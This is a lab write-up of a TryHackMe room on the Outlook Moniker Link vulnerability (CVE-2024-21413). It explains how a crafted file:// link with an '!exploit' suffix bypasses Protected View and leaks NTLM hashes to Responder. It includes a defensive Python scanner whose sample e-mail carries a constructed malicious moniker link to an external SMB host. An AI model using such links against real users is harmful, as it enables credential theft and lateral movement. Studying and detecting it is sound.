### Moniker Link (CVE-2024-21413)
**Room:** [Moniker Link (CVE-2024-21413) – TryHackMe](https://tryhackme.com/room/monikerlink)
**Status:** Completed
**Date:** *30 May 2025*
---
### Objective
Understand and exploit CVE-2024-21413, a vulnerability in Microsoft Outlook that bypasses Protected View using Moniker Links to leak NTLM credentials. Learn how to perform the attack and detect or mitigate it.
---
### Key Concepts
- **Moniker Link** – A type of hyperlink that can reference system components and applications in Windows using the COM model.
- **Protected View** – Outlook's read-only mode that blocks external content to protect users.
- **NTLM Hash Leak** – Triggering an SMB authentication attempt from the victim leaks their NetNTLMv2 hash to the attacker.
- **file:// Exploit** – Adding `!exploit` to a file:// URL bypasses Protected View and triggers an SMB connection.
- **Responder** – A tool used to capture NTLM hashes by listening for SMB authentication requests.
- **RCE (Remote Code Execution)** – The vulnerability also has the potential for code execution, though no public PoC currently exists.
- **Detection** – YARA rules and Wireshark can help detect attempted or successful exploitation.
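The detection point above (a `file://` link whose path carries a `!` moniker suffix, and any `file://` share link that would make Outlook reach out over SMB) can be checked in mail content before it reaches a client. The scanner below is an added example written for this writeup; it is not the room's material, not Responder, and not the YARA rule mentioned later. The e-mail samples and the `203.0.113.5` / `fileserver.example.test` hosts are constructed for the demonstration.

```python
"""Flag Moniker-style file:// links in e-mail bodies (CVE-2024-21413 indicator).

Added example for this writeup; the sample messages below are constructed.
"""
import re
from email import message_from_string
from email.message import Message
from typing import Dict, List

# High severity: file://<host>/<path>!<token>  (the room describes "!exploit").
# The path class excludes '!' so the first '!' after the path starts the suffix.
MONIKER_RE = re.compile(
    r"file://(?P<host>[^/\s\"'<>]+)/(?P<path>[^\s\"'<>!]+)!(?P<tail>[^\s\"'<>]*)",
    re.IGNORECASE,
)
# Medium severity: any remote file:// share link. A local link such as
# file:///C:/... has an empty host and does not match, since it causes no SMB traffic.
PLAIN_FILE_RE = re.compile(r"file://(?P<host>[^/\s\"'<>]+)/[^\s\"'<>]+", re.IGNORECASE)


def extract_text(msg: Message) -> str:
    """Concatenate every text/plain and text/html body part of the message."""
    parts = []
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            payload = part.get_payload(decode=True)
            if payload is not None:
                charset = part.get_content_charset() or "utf-8"
                parts.append(payload.decode(charset, errors="replace"))
    return "\n".join(parts)


def scan_email(raw: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious file:// link found in the message body."""
    body = extract_text(message_from_string(raw))
    findings: List[Dict[str, str]] = []
    for m in MONIKER_RE.finditer(body):
        findings.append({
            "severity": "high",
            "host": m.group("host"),
            "url": m.group(0),
            "reason": "file:// link with '!' moniker suffix (Protected View bypass pattern)",
        })
    for m in PLAIN_FILE_RE.finditer(body):
        if "!" in m.group(0):
            continue  # already reported above as a moniker link
        findings.append({
            "severity": "medium",
            "host": m.group("host"),
            "url": m.group(0),
            "reason": "remote file:// share link; clicking triggers outbound SMB authentication",
        })
    return findings


# Constructed sample messages (not real mail). 203.0.113.5 is a documentation address.
SAMPLE_BENIGN = (
    "From: sender@example.test\r\nTo: user@example.test\r\nSubject: Invoice\r\n"
    "Content-Type: text/html; charset=utf-8\r\n\r\n"
    '<p>Please review: <a href="https://example.test/invoice">invoice</a></p>\r\n'
)
SAMPLE_MALICIOUS = (
    "From: sender@example.test\r\nTo: user@example.test\r\nSubject: Invoice\r\n"
    "Content-Type: text/html; charset=utf-8\r\n\r\n"
    '<p>Please review: <a href="file://203.0.113.5/share/invoice.rtf!exploit">invoice</a></p>\r\n'
)
SAMPLE_SHARE_LINK = (
    "From: sender@example.test\r\nTo: user@example.test\r\nSubject: Report\r\n"
    "Content-Type: text/plain; charset=utf-8\r\n\r\n"
    "Report is at file://fileserver.example.test/docs/report.docx\r\n"
)

if __name__ == "__main__":
    for name, raw in (("benign", SAMPLE_BENIGN), ("moniker", SAMPLE_MALICIOUS),
                      ("share", SAMPLE_SHARE_LINK)):
        print(name, scan_email(raw))
```

Wire `scan_email` into a mail-gateway hook or run it over exported `.eml` files; the medium finding is worth keeping because even without the `!` suffix a remote `file://` link makes Outlook attempt SMB authentication, which is exactly what Responder captures.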
---
### Tools Used
- **Responder** – Captured the victim's NTLM hash once the malicious link was clicked.
- **Python (smtplib)** – Used to send the malicious email with the Moniker Link to the victim.
- **Outlook (on vulnerable VM)** – Email client that parsed the Moniker Link and leaked credentials.
- **YARA** – Rule by Florian Roth to detect email indicators of compromise.
- **Wireshark** – Used to view the SMB authentication request and hash in transit.
---
### Challenges Faced
- Modifying the Moniker Link syntax correctly to bypass Protected View required close attention to detail.
- Adjusting the exploit script to match IP and mail server settings took a couple of attempts.
---
### What I Learned
- Even trusted software like Outlook can be tricked into leaking credentials with low-complexity attacks.
- Small syntax changes (like `!exploit`) can completely bypass built-in protections.
- YARA rules are useful for catching suspicious behaviour in email content.
- Responder is a powerful tool for capturing authentication attempts, especially NTLM leaks over SMB.
---
### Real-World Application:
> A phishing email using a Moniker Link can be enough to leak NTLM hashes from Outlook users. In corporate environments, this could lead to lateral movement, privilege escalation, or pass-the-hash attacks, even before any malware is deployed.
---
### Reflections:
- This CVE was both simple and powerful: just one click on a crafted link and credentials are leaked.
- The attack chain was straightforward but highlights the importance of patching and monitoring.